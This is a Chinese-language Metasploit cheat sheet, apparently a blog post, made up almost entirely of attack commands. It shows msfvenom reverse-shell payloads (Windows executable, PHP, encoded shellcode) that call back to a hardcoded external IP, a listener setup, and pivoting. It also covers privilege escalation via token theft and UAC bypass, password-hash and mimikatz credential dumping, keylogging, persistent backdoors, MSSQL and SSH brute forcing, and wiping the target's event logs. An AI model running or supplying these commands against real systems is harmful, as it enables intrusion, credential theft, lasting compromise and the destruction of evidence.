payload的几个常用生成
1、生成windows下的反弹木马
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe |
2、监听
1 | use exploit/multi/handler |
3、PHP
1 | msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php |
4、shellcode
1 | msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py //-e 使用编码 -i 编码次数 |
内网代理
首先需要连接到你get到的sessions,在此基础下添加路由
1 | meterpreter > run get_local_subnets //获取网段 |
提权
1、getsystem
meterpreter > getsystem
//直getsystem提权,最常用简单的办法
2、使用exp提权
1 | meterpreter > background //先后台运行会话 |
3、盗取令牌
1 | meterpreter > use incognito //进入这个模块 |
注:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。
4、Bypassuac
1 | msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样 |
5、Hash
1 | meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。 |
建立持久后门
1、服务启动后门
1 | meterpreter > run metsvc -A //再开起一个终端,进入msfconsole |
2、启动项启动后门
1 | meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105 |
漏洞扫描
对端口都扫描
1 | use auxiliary/scanner/portscan/tcp |
mssql开发利用
2-1:对各个ip是否有mssql服务的探测
1 | use scanner/mssql/mssql_ping //测试MSSQL的存在和信息 |
2-2:对扫描到的ip进行爆破
1 | use scanner/mssql/mssql_login //具体配置show options |
2-3:sa权限对其利用
1 | use admin/mssql/mssql_exec |
爆破ssh模块
1 | use auxiliary/scanner/ssh/ssh_login |
通过nmap扫描基本漏洞
1 | msf > nmap --script=vuln 受害靶机ip地址 |
最后清除记录
1 | msf > clearev //删除目标机上的应用程序、系统和安全日志。 |
一些常用命令
查看系统命令 sysinfo
截图 screenshot
查看是否是虚拟机 run checkvm
查看运行木马的用户 getuid
注入到进程 migrate pid
//成功会提示successfully
加载mimikatz模块 meterpreter > load mimikatz meterpreter > wdigest
//需要system权限
获取键盘记录:meterpreter> run post/windows/capture/keylog_recorder
#运行键盘记录模块
进入session:sessions -i